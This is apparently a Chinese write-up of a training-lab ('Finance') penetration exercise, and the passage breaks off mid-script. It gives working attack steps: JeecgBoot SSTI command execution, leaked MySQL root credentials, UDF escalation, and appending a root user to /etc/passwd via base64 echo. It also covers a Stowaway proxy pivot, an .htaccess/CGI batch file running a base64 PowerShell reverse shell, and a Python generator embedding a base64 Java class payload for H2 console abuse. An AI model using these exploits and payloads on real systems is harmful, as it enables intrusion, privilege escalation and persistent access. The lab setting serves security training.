Finance
流程图:
玩家扮演渗透测试工程师,按任务对指定网络环境实施渗透以获取关键资产,同时需对指定场景配置进行安全核查,过程涵盖信息收集、初步渗透、横向扩展、权限提升、获取域内高级权限、维持长期访问等环节。场景共有8个flag,分布于不同的靶机。
1. Web01 172.22.10.22
1.1. 信息收集
使用fscan进行扫描
Fscan-wiki | 安全扫描知识库
┌──(root㉿kali)-[~/Desktop/ChunQiu/Finance]
└─# fscan -h 39.101.71.180
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.1
[994ms] 已选择服务扫描模式
[994ms] 开始信息扫描
[994ms] 最终有效主机数量: 1
[994ms] 开始主机扫描
[994ms] 使用服务插件: activemq, cassandra, elasticsearch, findnet, ftp, imap, kafka, ldap, memcached, modbus, mongodb, ms17010, mssql, mysql, neo4j, netbios, oracle, pop3, postgres, rabbitmq, rdp, redis, rsync, smb, smb2, smbghost, smtp, snmp, ssh, telnet, vnc, webpoc, webtitle
[995ms] 有效端口数量: 233
[1.1s] [*] 端口开放 39.101.71.180:22
[1.1s] [*] 端口开放 39.101.71.180:80
[1.1s] [*] 端口开放 39.101.71.180:8081
[1.2s] [*] 端口开放 39.101.71.180:3306
[4.0s] 扫描完成, 发现 4 个开放端口
[4.0s] 存活端口数量: 4
[4.0s] 开始漏洞扫描
[4.1s] POC加载完成: 总共387个,成功387个,失败0个
[4.1s] [*] 网站标题 http://39.101.71.180 状态码:200 长度:14323 标题:FinancePro ERP系统
[5.1s] [*] 网站标题 http://39.101.71.180:8081 状态码:200 长度:1766 标题:""
[44.6s] 扫描已完成: 6/6
┌──(root㉿kali)-[~/Desktop/ChunQiu/Finance]
└─# nmap 8.145.35.203 -p 22,80,3306,8081 -sCV
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-07 10:57 EST
Nmap scan report for 8.145.35.203
Host is up (0.037s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.18.0 (Ubuntu)
3306/tcp open mysql MySQL 5.7.33-0ubuntu0.16.04.1
8081/tcp open http nginx 1.18.0 (Ubuntu)
web 80端口是一个静态网页,没有什么东西(扫目录也扫不到什么)
1.2. JeecgBoot web8081
8081端口为JeecgBoot 后台服务API接口文档
这里可以直接用JeecgBoot的利用工具梭哈(如果运行时报错 找不到或无法加载主类 Main 换JDK8运行)
GitHub - MInggongK/jeecg-: jeecg综合漏洞利用工具
利用JeecgBoot jmreport/loadTableData SSTI模板注入漏洞 执行命令,但这个命令执行受限,我只要用一些特殊符号就报错,而且命令返回长度有限
通过PWD命令获取到当前网站工作目录,扫描的时候发现存在mysql,大概率网站配置文件中存在Mysql连接的相关配置信息,翻找目录并没有找到有用的配置文件。 在工作目录下可以发现有一个jar包,这个网站大概率是用这个jar包运行的,
直接用cp命令把这个jar包放到80端口网站目录 /var/www/html 下,然后访问路径即可下载这个jar包
cp jeecg-system-start-3.5.3.jar /var/www/html
这里会显示执行失败,但实际上是成功了的, 访问 IP/jeecg-system-start-3.5.3.jar 即可下载jar包
1.3. mysql 利用
下载好后,直接解压这个jar包,全局搜索3306马上就能找到mysql的配置信息
username: root
password: oZOgpwlvgh2N01eS
然后利用mdut 连接数据库
GitHub - DeEpinGh0st/MDUT-Extend-Release: MDUT-Extend(扩展版本)
这里用Udf提权开启命令执行,然后写一个特权账户到 /etc/passwd
┌──(root㉿kali)-[~/Desktop/ChunQiu/Finance]
└─# openssl passwd -6 123123 #生成密码hash
$6$VXmoBe/EfJOQLdHL$x2RU3nRSx3SL0o1mwu/The7PNMythhSMUnbeQD.hHrn9.IM51yD9ivqGy3Pw9pvSYZhOJ1ysvp80nbvbGcHW8/
#写到/etc/passwd (这里哈希密码有很多特殊符号用base64编码后写入)
echo YzF0cnVzOiQ2JGlqL1o4Y3FxYXdPQTJzR2skYW1EVzVWZnhJMklsUURUem1lRG9XYTFKZlRJYjBsTm8yVGFMc3E3c3JsTWNEWFFiV1k3dUNJaE1zZWE0SE8uN2dQSDFxcVUyQkI3THZlN2p6Ny5WWTA6MDowOnJvb3Q6L2hvbWUvYzF0cnVzOi9iaW4vYmFzaA== |base64 -d>> /etc/passwd
然后使用账号密码连接 c1trus 123123
PS: 我感觉写
/etc/passwd这一步可能也可以在Jeecgboot的利用工具中完成,但是我没成功过
1.4. 内网代理(第一层)
进来后先看下网络连接,可以发现有个redis的docker,但里面没有什么东西,此外mysql数据库里面也是没有什么东西的
然后看一下网卡信息,看看内网网段
root@web01:/tmp# ifconfig
docker0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.17.0.1 netmask 255.255.0.0 broadcast 172.17.255.255
inet6 fe80::42:54ff:fe6c:9753 prefixlen 64 scopeid 0x20<link>
ether 02:42:54:6c:97:53 txqueuelen 0 (Ethernet)
RX packets 1129 bytes 51857 (51.8 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1136 bytes 68313 (68.3 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.22.10.22 netmask 255.255.255.0 broadcast 172.22.10.255
inet6 fe80::216:3eff:fe08:cb8d prefixlen 64 scopeid 0x20<link>
ether 00:16:3e:08:cb:8d txqueuelen 1000 (Ethernet)
RX packets 29340 bytes 16868150 (16.8 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 81588 bytes 194571089 (194.5 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 28074 bytes 2843232 (2.8 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 28074 bytes 2843232 (2.8 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
vethdeabb72: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet6 fe80::2cea:c2ff:feba:d702 prefixlen 64 scopeid 0x20<link>
ether 2e:ea:c2:ba:d7:02 txqueuelen 0 (Ethernet)
RX packets 1129 bytes 67663 (67.6 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1152 bytes 69529 (69.5 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
GitHub - ph4ntonn/Stowaway: 👻Stowaway -- Multi-hop Proxy Tool for pentesters
因为当前机器是只允许22、3306、80、8081端口出网的,我们把22端口的ssh服务给kill了(在此之前多开几个ssh窗口,后面用),然后上传Stowaway的agent端搭建代理
Stowaway搭建多级网络代理
#(靶机web01执行)
root@web01:/# chmod +x linux_x64_agent
root@web01:/# ./linux_x64_agent -l 22
2025/11/15 02:25:19 [*] Starting agent node passively.Now listening on port 22
#(你的VPS执行)
# ./linux_x64_admin -c $靶机IP:22
(admin) >> use 0
(node 0) >> socks 9999
这样就行搭好代理了,可以通过 vpsIP:9999 作为跳板访问到内网10网段
在kali上配置 /etc/proxychains4.conf 通过proxychains来使用代理
windows上使用proxyfier配置来使用代理 (地址为你的vps IP)
1.5. 内网扫描
上传Fscan到web01对内网10网段进行扫描
root@web01:/root# ./FScan_2.0.1_linux_x64 -h 172.22.10.22/24
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.1
[1.8s] 已选择服务扫描模式
[1.8s] 开始信息扫描
[1.8s] CIDR范围: 172.22.10.0-172.22.10.255
[1.8s] generate_ip_range_full
[1.8s] 解析CIDR 172.22.10.22/24 -> IP范围 172.22.10.0-172.22.10.255
[1.9s] 最终有效主机数量: 256
[1.9s] 开始主机扫描
[1.9s] 使用服务插件: activemq, cassandra, elasticsearch, findnet, ftp, imap, kafka, ldap, memcached, modbus, mongodb, ms17010, mssql, mysql, neo4j, netbios, oracle, pop3, postgres, rabbitmq, rdp, redis, rsync, smb, smb2, smbghost, smtp, snmp, ssh, telnet, vnc, webpoc, webtitle
[1.9s] [*] 目标 172.22.10.22 存活 (ICMP)
[1.9s] [*] 目标 172.22.10.17 存活 (ICMP)
[1.9s] [*] 目标 172.22.10.253 存活 (ICMP)
[1.9s] [*] 目标 172.22.10.88 存活 (ICMP)
[4.9s] 存活主机数量: 4
[4.9s] 有效端口数量: 233
[4.9s] [*] 端口开放 172.22.10.22:6379
[4.9s] [*] 端口开放 172.22.10.22:80
[4.9s] [*] 端口开放 172.22.10.22:3306
[4.9s] [*] 端口开放 172.22.10.22:8081
[4.9s] [*] 端口开放 172.22.10.22:8080
[4.9s] [*] 端口开放 172.22.10.17:22
[4.9s] [*] 端口开放 172.22.10.88:21
[4.9s] [*] 端口开放 172.22.10.88:80
[4.9s] [*] 端口开放 172.22.10.88:445
[4.9s] [*] 端口开放 172.22.10.88:139
[4.9s] [*] 端口开放 172.22.10.88:135
[7.9s] 扫描完成, 发现 11 个开放端口
[7.9s] 存活端口数量: 11
[7.9s] 开始漏洞扫描
[7.9s] [*] NetInfo 扫描结果
目标主机: 172.22.10.88
主机名: web02
发现的网络接口:
IPv4地址:
└─ 172.22.10.88
[7.9s] [*] 网站标题 http://172.22.10.22 状态码:200 长度:14323 标题:FinancePro ERP系统
[8.0s] [+] NetBios 172.22.10.88 WORKGROUP\WEB02
[8.0s] [*] 网站标题 http://172.22.10.88 状态码:403 长度:199 标题:403 Forbidden
[8.0s] POC加载完成: 总共387个,成功387个,失败0个
[8.1s] [+] FTP服务 172.22.10.88:21 匿名登录成功!
[8.1s] [*] 网站标题 http://172.22.10.22:8080 状态码:404 长度:682 标题:HTTP Status 404 – Not Found
[8.1s] [*] 网站标题 http://172.22.10.22:8081 状态码:200 长度:1766 标题:""
[36.6s] 扫描已完成: 18/18
扫描结果
172.22.10.22 入口机 jeecgboot Web01
172.22.10.88 WORKGROUP\WEB02 ftp
172.22.10.17 Ollama
172.22.10.253 网关
2. Web02 172.22.10.88
通过Fscan的扫描可以发现web02开放了以下端口
[4.9s] [*] 端口开放 172.22.10.88:21
[4.9s] [*] 端口开放 172.22.10.88:80
[4.9s] [*] 端口开放 172.22.10.88:445
[4.9s] [*] 端口开放 172.22.10.88:139
[4.9s] [*] 端口开放 172.22.10.88:135
从 135 139 445端口的开放很容易就可以判断出这个一台windwos机器,此外21端口说明这个机器存在FTP服务器。
2.1. FTP 匿名会话
使用 anonymous 作为用户 登录ftp服务器,可以发现里面有两个文件 .htaccess index.html
root@web01:/root# ftp 172.22.10.88
Connected to 172.22.10.88.
220-FileZilla Server 中文版 0.9.60 beta
220-written by Tim Kosse (tim.kosse@filezilla-project.org)
220 Please visit https://filezilla-project.org/
Name (172.22.10.88:root): anonymous
331 Password required for anonymous
Password:
230 Logged on
Remote system type is UNIX.
ftp> ls
150 Opening data channel for directory listing of "/"
-rw-r--r-- 1 ftp ftp 18 Jun 27 2025 .htaccess
-rw-r--r-- 1 ftp ftp 46 Jun 11 2007 index.html
#下载文件
ftp> bin #切换位ASCII 模式,linux连Windows的ftp服务器一定要开启,否则下载二进制文件格式会有问题,但这里下载文本文件,也没啥问题
ftp> get index.html
ftp> get .htaccess
ftp> exit
查看文件内容
root@web01:/root# cat index.html
<html><body><h1>It works!</h1></body></html>
root@web01:/root# cat .htaccess
Require all denied
root@web01:/root#
2.2. .htaccess利用
.htaccess 是 Apache Web 服务器的目录级配置文件,用于在不修改主配置的情况下控制目录行为。
这里配置为 Require all denied 表明访问任何目录都会返回403
我们访问Web02的80端口,可以发现是会报403的,
当你删掉 .htaccess 的内容时,即可正常访问
Options +ExecCGI
SetHandler cgi-script
这里表示把目录下所有文件都用cgi解析
然后我这里再上传一个 hello.bat (名字随便取)
里面写上反弹shell的命令
先生成一个base64 的powershell命令
反弹shell生成器
然后上传如下内容的 hello.bat 到FTP服务器
@echo off
echo Content-Type: text/plain
echo.
powershell -e JABjAGwAaQBlAG....生成的powershell base64 payload
然后开启监听并访问 http://172.22.10.88/hello.bat,即可收到shell
这个cgi反弹回来的shell,你可能有时候执行命令看不到flag.txt。有时候有可以看到,使用下面的命令可以稳定的查看
powershell -Command "Get-Content 'C:\users\administrator\desktop\f1ag.txt'"
3. DataBase 172.22.10.7
这台机器是 禁了ICMP的(禁ping),所以在前面fscan扫描时,做主机存活探测是,是无法探测到的,也自然就发现不了这台主机的端口开放
后面我拿完了其他全部机器的flag,然后找了几个小时最后一个flag都没找到后,问作者才知道,原来还有一台 172.22.10.7 机器
在Web01上使用Fscan扫描C端
root@web01:~# ./FScan_2.0.1_linux_x64 -h 172.22.10.0/24 -nopoc -nobr -np
可以发现这台机器是开放了8080端口,然后做一个全端口扫描看看
root@web01:~# ./FScan_2.0.1_linux_x64 -h 172.22.10.7 -p all
扫完全端口后确认只有一个8080开放
3.1. 金融数据库管理界面
访问8080端口 发现就是这个金融数据库管理界面
通过报错发现是SrpingBoot框架
使用SpringBoot Scan进行扫描,没有发现任何有效的路径,这里结合SpringBoot和数据库关键词,可以猜测可能是h2 database, 访问 /h2-console 发现确实存在h2db,且有h2db console的未授权访问
3.2. JDBC 不出网利用
由于本人只学过2个半月java,这个点超出自己的能力,再挣扎了5个小时没能打通后,请了一位java大佬 @godown 来帮我拿下的
下面是 @godown 师傅的解题过程
报错显示h2版本为2.1.214,如果要直接打h2 webconsole,虽然目标开了自创建test数据库,还是需要出网才能打ClassPathXmlApplicationContext,不出网需要commons-io写文件。
https://godownio.github.io/2025/05/06/jre17-huan-jing-xia-de-h2-jdbc-attack/
但是h2 webconsole可以用其他数据库驱动,在tomcat环境下可以利用Tomcat临时文件达到不出网ClassPathXmlApplicationContext的利用(也就是利用AntPathMatcher.isPattern的解析环境变量和通配符的功能),打的postgresql组件
先尝试一手最通用的ascii-jar写绕过脏数据的通用手法,用下面的payload产生一个jar包
#!/usr/bin/env python
# autor: c0ny1
# date 2022-02-13
from __future__ import print_function
import time
from compress import *
allow_bytes = []
disallowed_bytes = [38,60,39,62,34,40,41] # &<'>"()
for b in range(0,128): # ASCII
if b in disallowed_bytes:
continue
allow_bytes.append(b)
if __name__ == '__main__':
padding_char = 'A'
raw_filename = 'poc.xml'
zip_entity_filename = 'META-INF/resources/poc.xml'
jar_filename = 'ascii02.jar'
num = 1
while True:
# step1 动态生成java代码并编译
javaCode = """<?xml version="1.0" encoding="UTF-8"?>
<!-- {PADDING_DATA} -->
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.springframework.org/schema/beans
http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="decoder" class="org.springframework.beans.factory.config.MethodInvokingFactoryBean">
<property name="staticMethod" value="javax.xml.bind.DatatypeConverter.parseBase64Binary"/>
<property name="arguments">
<list>
<value>yv66vgAAADIBOwEAWW9yZy9hcGFjaGUvY29sbGVjdGlvbnMvY295b3RlL1J1bnRpbWVKc29uTWFwcGluZ0V4Y2VwdGlvbmJkZDg2N2FkM2U2ZDQ3YWI4YjNkMjE3M2U5ZTQ0YWEyBwABAQAQamF2YS9sYW5nL09iamVjdAcAAwEABjxpbml0PgEAAygpVgEAE2phdmEvbGFuZy9FeGNlcHRpb24HAAcMAAUABgoABAAJAQADcnVuDAALAAYKAAIADAEAEGdldFJlcUhlYWRlck5hbWUBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEAD1gtQXV0aG9yaXphdGlvbggAEAEAHmphdmEvbGFuZy9Ob1N1Y2hGaWVsZEV4Y2VwdGlvbgcAEgEAE2phdmEvbGFuZy9UaHJvd2FibGUHABQBABBqYXZhL2xhbmcvVGhyZWFkBwAWAQAKZ2V0VGhyZWFkcwgAGAEAD2phdmEvbGFuZy9DbGFzcwcAGgEAEltMamF2YS9sYW5nL0NsYXNzOwcAHAEAEWdldERlY2xhcmVkTWV0aG9kAQBAKExqYXZhL2xhbmcvU3RyaW5nO1tMamF2YS9sYW5nL0NsYXNzOylMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwwAHgAfCgAbACABABhqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2QHACIBAA1zZXRBY2Nlc3NpYmxlAQAEKFopVgwAJAAlCgAjACYBAAZpbnZva2UBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsMACgAKQoAIwAqAQATW0xqYXZhL2xhbmcvVGhyZWFkOwcALAEAB2dldE5hbWUMAC4ADwoAFwAvAQAEaHR0cAgAMQEAEGphdmEvbGFuZy9TdHJpbmcHADMBAAhjb250YWlucwEAGyhMamF2YS9sYW5nL0NoYXJTZXF1ZW5jZTspWgwANQA2CgA0ADcBAAhBY2NlcHRvcggAOQEACGdldENsYXNzAQATKClMamF2YS9sYW5nL0NsYXNzOwwAOwA8CgAEAD0BAAZ0YXJnZXQIAD8BABBnZXREZWNsYXJlZEZpZWxkAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7DABBAEIKABsAQwEAF2phdmEvbGFuZy9yZWZsZWN0L0ZpZWxkBwBFCgBGACYBAANnZXQBACYoTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwwASABJCgBGAEoBAAhlbmRwb2ludAgATAEABnRoaXMkMAgATgEAB2hhbmRsZXIIAFABAA1nZXRTdXBlcmNsYXNzDABSADwKABsAUwEABmdsb2JhbAgAVQEADmdldENsYXNzTG9hZGVyAQAZKClMamF2YS9sYW5nL0NsYXNzTG9hZGVyOwwAVwBYCgAbAFkBACJvcmcuYXBhY2hlLmNveW90ZS5SZXF1ZXN0R3JvdXBJbmZvCABbAQAVamF2YS9sYW5nL0NsYXNzTG9hZGVyBwBdAQAJbG9hZENsYXNzAQAlKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL0NsYXNzOwwAXwBgCgBeAGEKABsALwEACnByb2Nlc3NvcnMIAGQBABNqYXZhL3V0aWwvQXJyYXlMaXN0BwBmAQAEc2l6ZQEAAygpSQwAaABpCgBnAGoBABUoSSlMamF2YS9sYW5nL09iamVjdDsMAEgAbAoAZwBtAQADcmVxCABvAQAHZ2V0Tm90ZQgAcQEAEWphdmEvbGFuZy9JbnRlZ2VyBwBzAQAEVFlQRQEAEUxqYXZhL2xhbmcvQ2xhc3M7DAB1AHYJAHQAdwEAB3ZhbHVlT2YBABYoSSlMamF2YS9sYW5nL0ludGVnZXI7DAB5AHoKAHQAewEACWdldEhlYWRlcggAfQEACWdldE1ldGhvZAwAfwAfCgAbAIAMAA4ADwoAAgCCAQALZ2V0UmVzcG9uc2UIAIQBAAlnZXRXcml0ZXIIAIYBAA5qYXZhL2lvL1dyaXRlcgcAiAEABmhhbmRsZQEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7DACKAIsKAAIAjAEABXdyaXRlAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWDACOAI8KAIkAkAEABWZsdXNoDACSAAYKAIkAkwEABWNsb3NlDACVAAYKAIkAlgEABGV4ZWMBAAdvcy5uYW1lCACZAQAQamF2YS9sYW5nL1N5c3RlbQcAmwEAC2dldFByb3BlcnR5DACdAIsKAJwAngEAC3RvTG93ZXJDYXNlDACgAA8KADQAoQEAA3dpbggAowEABy9iaW4vc2gIAKUBAAItYwgApwEAB2NtZC5leGUIAKkBAAIvYwgAqwEAEWphdmEvbGFuZy9SdW50aW1lBwCtAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwwArwCwCgCuALEBACgoW0xqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7DACYALMKAK4AtAEAEWphdmEvbGFuZy9Qcm9jZXNzBwC2AQAOZ2V0SW5wdXRTdHJlYW0BABcoKUxqYXZhL2lvL0lucHV0U3RyZWFtOwwAuAC5CgC3ALoBABFqYXZhL3V0aWwvU2Nhbm5lcgcAvAEAGChMamF2YS9pby9JbnB1dFN0cmVhbTspVgwABQC+CgC9AL8BAAJcYQgAwQEADHVzZURlbGltaXRlcgEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvdXRpbC9TY2FubmVyOwwAwwDECgC9AMUBAAAIAMcBAAdoYXNOZXh0AQADKClaDADJAMoKAL0AywEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyBwDNCgDOAAkBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsMANAA0QoAzgDSAQAEbmV4dAwA1AAPCgC9ANUBAAh0b1N0cmluZwwA1wAPCgDOANgBAApnZXRNZXNzYWdlDADaAA8KAAgA2wEAE1tMamF2YS9sYW5nL1N0cmluZzsHAN0BABNqYXZhL2lvL0lucHV0U3RyZWFtBwDfAQAGZXlKZVhBCADhAQAKc3RhcnRzV2l0aAEAFShMamF2YS9sYW5nL1N0cmluZzspWgwA4wDkCgA0AOUBAAZsZW5ndGgMAOcAaQoANADoAQAGY2hhckF0AQAEKEkpQwwA6gDrCgA0AOwBABUoQylMamF2YS9sYW5nL1N0cmluZzsMAHkA7goANADvAQAIcGFyc2VJbnQBABUoTGphdmEvbGFuZy9TdHJpbmc7KUkMAPEA8goAdADzAQABLggA9QEAB2luZGV4T2YMAPcA8goANAD4AQAJc3Vic3RyaW5nAQAWKElJKUxqYXZhL2xhbmcvU3RyaW5nOwwA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</value>
</list>
</property>
</bean>
<bean id="classLoader" class="javax.management.loading.MLet"/>
<bean id="clazz" factory-bean="classLoader" factory-method="defineClass">
<constructor-arg ref="decoder"/>
<constructor-arg type="int" value="0"/>
<constructor-arg type="int" value="5128"/>
</bean>
<bean factory-bean="clazz" factory-method="newInstance"/>
</beans>
"""
padding_data = padding_char * num
javaCode = javaCode.replace("{PADDING_DATA}", padding_data)
f = open(raw_filename, 'w')
f.write(javaCode)
f.close()
time.sleep(0.1)
# step02 计算压缩之后的各个部分是否在允许的ASCII范围
raw_data = bytearray(open(raw_filename, 'rb').read())
compressor = ASCIICompressor(bytearray(allow_bytes))
compressed_data = compressor.compress(raw_data)[0]
crc = zlib.crc32(raw_data) % pow(2, 32)
st_crc = struct.pack('<L', crc)
st_raw_data = struct.pack('<L', len(raw_data) % pow(2, 32))
st_compressed_data = struct.pack('<L', len(compressed_data) % pow(2, 32))
st_cdzf = struct.pack('<L', len(compressed_data) + len(zip_entity_filename) + 0x1e)
b_crc = isAllowBytes(st_crc, allow_bytes)
b_raw_data = isAllowBytes(st_raw_data, allow_bytes)
b_compressed_data = isAllowBytes(st_compressed_data, allow_bytes)
b_cdzf = isAllowBytes(st_cdzf, allow_bytes)
# step03 判断各个部分是否符在允许字节范围
if b_crc and b_raw_data and b_compressed_data and b_cdzf:
print('[+] CRC:{0} RDL:{1} CDL:{2} CDAFL:{3} Padding data: {4}*{5}'.format(b_crc, b_raw_data, b_compressed_data, b_cdzf, num, padding_char))
# step04 保存最终ascii jar
